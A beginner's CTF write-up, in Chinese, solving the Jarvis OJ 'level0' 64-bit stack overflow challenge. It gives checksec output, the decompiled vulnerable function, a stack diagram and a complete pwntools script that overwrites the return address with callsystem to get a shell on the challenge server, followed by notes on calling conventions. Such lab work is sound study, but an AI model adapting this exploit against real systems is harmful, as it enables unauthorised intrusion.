菜鸟入门,先从level0开始下手。
首先checksec,发现开启了nx保护。
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
拖进64位ida,查看vulnerable_function
ssize_t vulnerable_function()
{
char buf; // [rsp+0h] [rbp-80h]
return read(0, &buf, 0x200uLL);
}
发现开辟了0x80的缓冲区,读取了0x200的内容,同时幸运地发现了callsystem函数,考虑缓冲区保护了,可以将返回地址覆盖为callsystem地址。
正常vulnerable函数栈如下:
| 高 | vul_ret_address |
|---|---|
| ebp | |
| buf | |
| 低 |
栈的增长方向是从高地址向低地址。
我们要做的是把vul_ret_address覆盖成callsystem地址。
构造payload=‘a’*0x80+‘junk-ebp’+p64(sys_addr)
脚本如下:
from pwn import *
context.log_level="debug"
p=remote("pwn2.jarvisoj.com",9881)
e=ELF("level0")
sys_addr=e.symbols['callsystem']
payload='a'*0x80+'junk-ebp'+p64(sys_addr)
p.send(payload)
p.interactive()
p.close()
几个收获:
pwntools的使用。函数运行时栈的状态,函数运行时先push ebp,将原栈底地址入栈。ebp栈底指针,esp栈顶指针,esp会一直变化。调用函数时须先将下一跳地址压栈,即调用完函数的返回地址。
分享一篇入门好文章
遗留问题:
通过e.symbols['system']和e.search('/bin/sh').next()获取bin/sh地址和system地址,构造system("/bin/sh")为什么不行?没想明白以后再看
知道了,level0是64位程序,参数不保存在栈上,可以利用pop rdi,类似于level3_x64
一开始以为recv()没什么用,还是需要用recv,只有recv了,服务器返回的字符串才会从缓存中丢弃,要不可能recv的是上一条返回值,要注意。